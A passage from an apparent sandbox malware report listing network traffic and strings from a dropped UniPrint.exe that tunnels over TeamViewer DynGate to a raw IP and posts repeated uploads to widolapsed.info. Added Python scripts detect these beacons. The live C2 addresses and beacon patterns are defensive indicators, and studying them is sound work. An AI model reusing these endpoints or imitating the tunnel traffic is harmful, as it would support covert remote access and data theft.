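Two things in the traffic above are worth turning into detection logic. The "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)" User-Agent is what TeamViewer's HTTP tunnel sends to its din.aspx/dout.aspx routing endpoints (seen here against master12.teamviewer.com); the same string fronting multipart/form-data POSTs to widolapsed.info is the sample reusing it for its own channel. Second, those POSTs go to one fixed path with bodies of roughly 76 to 85 KB each, a repeated-upload shape that the report's separate screenshot-capture finding makes worth carving from the pcap. The Python below is an added illustration, not part of the report or of Joe Sandbox. Its parser accepts the report's rendering, in which the headers run together without CRLFs, as well as properly delimited requests; the request lines it runs on are constructed from values in the report (six of the 44 POSTs, three routing requests) plus one ordinary browser request for contrast. The thresholds, the "unverified host" label for the raw IP (the report does not say whether 188.172.198.151 is a TeamViewer router) and the benign request are assumptions for the demonstration.

```python
"""Parse the HTTP requests as the report prints them and flag two patterns:
the TeamViewer 'DynGate' User-Agent used outside TeamViewer's own routing
protocol, and repeated multipart uploads of near-constant size to one URL.

Added example, not part of the report. The request lines below are
constructed from the report's own values plus one benign request.
"""
import re
import statistics
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

DYNGATE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"

# The report's rendering runs the headers together (no CRLF); the template
# reproduces that form on purpose so the parser is exercised on it.
POST_TEMPLATE = ("POST /B8C631A8/ HTTP/1.1Content-Length: {n}Content-Type: multipart/form-data; "
                 "boundary=--------{b}User-Agent: " + DYNGATE_UA +
                 "Host: widolapsed.infoConnection: CloseCache-Control: no-cache")
OBSERVED_POSTS = [(76431, 3259937207), (76426, 974736809), (81223, 1733772180),
                  (81262, 3571177622), (81298, 3135628383), (83326, 2112300367)]

SAMPLE_REQUESTS = [POST_TEMPLATE.format(n=n, b=b) for n, b in OBSERVED_POSTS] + [
    "GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: "
    + DYNGATE_UA + "Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache",
    "GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: "
    + DYNGATE_UA + "Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache",
    "GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: "
    + DYNGATE_UA + "Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache",
    # Constructed benign request, CRLF-delimited, for contrast.
    "GET /index.html HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\nHost: example.com\r\nConnection: Keep-Alive",
]

HEADER_NAMES = ("Accept", "Content-Length", "Content-Type", "Content-Transfer-Encoding",
                "User-Agent", "Host", "Connection", "Cache-Control")
# Zero-width split in front of every "<Known-Header>: " so run-together headers separate.
_HEADER_BOUNDARY = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]   # lower-cased names


def parse_request(raw: str) -> Request:
    """Accept CRLF-delimited, ' | '-delimited or run-together header blocks."""
    pieces: List[str] = []
    for chunk in re.split(r"\r?\n| \| ", raw.strip()):
        pieces.extend(p.strip() for p in _HEADER_BOUNDARY.split(chunk) if p.strip())
    method, path, _version = pieces[0].split()
    headers = {}
    for line in pieces[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def classify(req: Request) -> str:
    """Label a request by how the DynGate User-Agent is being used."""
    if "DynGate" not in req.headers.get("user-agent", ""):
        return "other"
    host = req.headers.get("host", "").lower()
    base = req.path.split("?", 1)[0]
    # TeamViewer's HTTP tunnel talks to din.aspx/dout.aspx with client=DynGate.
    if base in ("/din.aspx", "/dout.aspx") and "client=DynGate" in req.path:
        return "teamviewer-routing" if host.endswith(".teamviewer.com") else "teamviewer-routing-unverified-host"
    # The same UA on any other URL is not TeamViewer's protocol: here it
    # fronts multipart uploads to widolapsed.info.
    return "dyngate-ua-off-protocol"


def find_repeated_uploads(reqs: List[Request], min_count: int = 5, max_spread: float = 0.25) -> List[dict]:
    """Group multipart POSTs by host+path; report groups whose sizes stay within max_spread of the median."""
    sizes = defaultdict(list)
    for r in reqs:
        if r.method == "POST" and r.headers.get("content-type", "").startswith("multipart/form-data"):
            sizes[(r.headers.get("host", ""), r.path)].append(int(r.headers.get("content-length", "0")))
    findings = []
    for (host, path), s in sizes.items():
        median = statistics.median(s)
        if len(s) >= min_count and median and (max(s) - min(s)) / median <= max_spread:
            findings.append({"host": host, "path": path, "count": len(s),
                             "min": min(s), "max": max(s), "median": median})
    return findings


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for r in parsed:
        print(f"{classify(r):36} {r.method} {r.headers.get('host')}{r.path[:40]}")
    for f in find_repeated_uploads(parsed):
        print("repeated upload:", f)
```

On full traffic the size heuristic needs the timestamps as well (the interval between POSTs is the other half of a beacon signature), and the "unverified host" label should be resolved against TeamViewer's published router list before it is treated as malicious; what is unambiguous from the report alone is the DynGate User-Agent on a non-TeamViewer URL.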
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151 (identical entry repeated 38 times in the report)
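The HTTP requests listed above (TeamViewer's DynGate HTTP tunnel: GET /din.aspx polls for inbound data, POST /dout.aspx pushes outbound data, the User-Agent and the client= parameter both carry the string DynGate) and the direct-to-IP connections to 188.172.198.151 that no DNS query preceded are the two network signals a detection engineer would pull out of this report. The Python below is an added example, not part of the sandbox report or of any TeamViewer tooling: it parses raw HTTP request heads, tags DynGate beacons with their endpoint and s= session id, and marks requests whose Host header is a literal IP. The sample requests are constructed from the request lines in the report; the function and class names are my own.

```python
"""Flag TeamViewer DynGate HTTP-tunnel beacons in captured HTTP requests (added example)."""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

DYNGATE_UA = re.compile(r"\bDynGate\b")


@dataclass
class DynGateHit:
    method: str
    host: str
    endpoint: str        # "din": client polls for inbound data; "dout": client pushes outbound data
    session: str         # s= parameter; the report shows s=00000000 on the first contact with a relay
    direct_ip: bool      # Host header is a literal IP, so no DNS lookup preceded the connection
    content_length: int  # body size pushed on a dout POST (0 for GET polls)


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_literal_ip(host: str) -> bool:
    """True when the Host header names an address rather than a hostname."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0] if host.count(":") == 1 else host)
        return True
    except ValueError:
        return False


def classify(raw: str) -> DynGateHit | None:
    """Return a DynGateHit for a din/dout beacon, None for anything else."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    # Two independent signals seen in the report: the UA string and the client= parameter.
    if not DYNGATE_UA.search(headers.get("user-agent", "")) and query.get("client") != "DynGate":
        return None
    name = url.path.rsplit("/", 1)[-1]
    endpoint = name[:-5] if name.endswith(".aspx") else name
    if endpoint not in ("din", "dout"):
        return None
    host = headers.get("host", "")
    return DynGateHit(method, host, endpoint, query.get("s", ""), is_literal_ip(host),
                      int(headers.get("content-length", "0") or 0))


def scan(requests: list[str]) -> list[DynGateHit]:
    return [hit for hit in map(classify, requests) if hit is not None]


def summarize(hits: list[DynGateHit]) -> dict[tuple[str, str], dict]:
    """Group hits per (host, session): din and dout of one tunnel share the same s= id."""
    sessions: dict[tuple[str, str], dict] = {}
    for hit in hits:
        entry = sessions.setdefault((hit.host, hit.session),
                                    {"direct_ip": hit.direct_ip, "endpoints": set(), "bytes_out": 0})
        entry["endpoints"].add(hit.endpoint)
        entry["bytes_out"] += hit.content_length
    return sessions


def _req(*lines: str) -> str:
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed sample input, rebuilt from the request lines the report lists above.
SAMPLE_REQUESTS = [
    _req("GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1", "Accept: */*",
         "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)", "Host: master12.teamviewer.com",
         "Connection: Keep-Alive", "Cache-Control: no-cache"),
    _req("GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1",
         "Accept: */*", "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)",
         "Host: 188.172.198.151", "Connection: Keep-Alive", "Cache-Control: no-cache"),
    _req("POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1", "Accept: */*",
         "Content-Type: application/octet-stream", "Content-Transfer-Encoding: binary",
         "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)", "Host: 188.172.198.151",
         "Content-Length: 500000", "Connection: Keep-Alive", "Cache-Control: no-cache"),
    # Control case: an ordinary request to the vendor site must not be flagged.
    _req("GET /favicon.ico HTTP/1.1", "User-Agent: Mozilla/5.0", "Host: www.teamviewer.com"),
]

if __name__ == "__main__":
    for key, entry in summarize(scan(SAMPLE_REQUESTS)).items():
        print(key, entry)
```

The per-session summary is what makes the result actionable: a tunnel that opens with s=00000000 against a literal-IP relay and then pushes a 500000-byte dout body from a process named UniPrint.exe (the process the report attributes these strings to) is a different triage case from a user's sanctioned TeamViewer client, even though the HTTP pattern is identical, so the rule should be fed process name and host inventory rather than fired on the URI alone.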
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=100000012
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001N&
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001v
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002l
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000001&client=DynGate
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGated
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000003.00000002.538052811.0000024FB000E000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001
Source: UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001ayTo-UPnP-E
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001q
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001&%
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001ZqcGy
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082859&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002er12.teamviewer.com
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082873&client=DynGate&p=10000002W
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5Mko
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeq
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=4082873&client=DynGate&p=100
Source: wogZe27GBB.exe, wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com/help
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000002.00000002.294871479.0000000002870000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.349624220.0000000002830000.00000004.00000001.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000003.344077474.00000000028E1000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372091300.0000000002860000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000003.370863061.0000000002831000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/company/index.aspx
